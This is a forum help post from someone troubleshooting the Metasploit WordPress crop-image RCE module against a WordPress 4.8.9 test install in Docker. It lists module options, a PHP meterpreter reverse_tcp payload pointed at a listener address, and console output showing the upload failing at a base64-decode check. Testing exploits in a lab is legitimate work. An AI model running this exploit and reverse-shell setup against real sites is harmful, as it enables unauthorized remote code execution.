– Exploit aborted due to failure: not-found: Can’t find base64 decode on target

  docker, metasploit, php, security, wordpress

So. I am having some issues at metasploit.
I am trying to exploit
exploit/multi/http/wp_crop_rce.

I am using Docker, in order to install wordpress version: 4.8.9.

PHP 7.2.12 (cli) (built: Nov 28 2018 22:58:16) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
with Zend OPcache v7.2.12, Copyright (c) 1999-2018, by Zend Technologies

wordpress version: 4.8.9
metasploit:latest version

    Module options (exploit/multi/http/wp_crop_rce):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       PASSWORD   password1234     yes       The WordPress password to authenticate with
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS     172.17.0.1       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT      8000             yes       The target port (TCP)
       SSL        false            no        Negotiate SSL/TLS for outgoing connections
       TARGETURI  /                yes       The base path to the wordpress application
       USERNAME   admin            yes       The WordPress username to authenticate with
       VHOST                       no        HTTP server virtual host
    
    
    Payload options (php/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.91.130   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
   0   WordPress

Expected behavior

Should be run without any error and meterpreter session will open.

Current behavior -> Can’t find Base64 decode error.

[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[-] **Exploit aborted due to failure: not-found: Can't find base64 decode on target**
[*] Exploit completed, but no session was created.

Ubuntu machine

Source: Ask PHP

LEAVE A COMMENT